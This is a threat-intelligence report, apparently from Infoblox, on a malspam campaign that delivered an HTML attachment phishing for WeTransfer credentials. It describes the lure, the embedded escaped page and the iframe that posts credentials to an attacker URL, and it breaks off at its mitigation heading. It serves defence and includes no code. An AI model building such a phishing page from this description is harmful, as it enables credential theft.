On 20 September, Infoblox observed a malicious spam (malspam) campaign delivering a malicious HTML file capable of phishing for credentials. While threat actor(s) used generic lures in their emails, the HTML file specifically targeted WeTransfer, a file-sharing service.
2. Customer Impact
Threat actors used a malicious HTML file in this campaign that is not related to any family of malware that Infoblox is aware of. The file harvests and exfiltrates WeTransfer credentials.
3. Campaign Analysis
In this campaign, threat actors sent victims an email with a subject of Request for Quotation-Urgent!!!. While the message body was empty, the email did include an HTML file attachment named order – Copy.html.
4. Attack Chain
The HTML file contains a secondary escaped HTML page embedded in its contents. When the victim opens the attachment, it will unpack the secondary HTML page and alert the user that they are viewing a secure document and need to log in to view its contents. If the user successfully logs into the WeTransfer service, an embedded iframe within the second HTML page will collect and post credentials to an attacker-owned URL. However, if the user fails to log in, the HTML page will alert them that their credentials are invalid.
5. Vulnerabilities and Mitigation
This malspam campaign relies solely on social engineering tactics to persuade the victim into revealing their credentials. As such, Infoblox recommends the following precautions to reduce the possibility of compromise: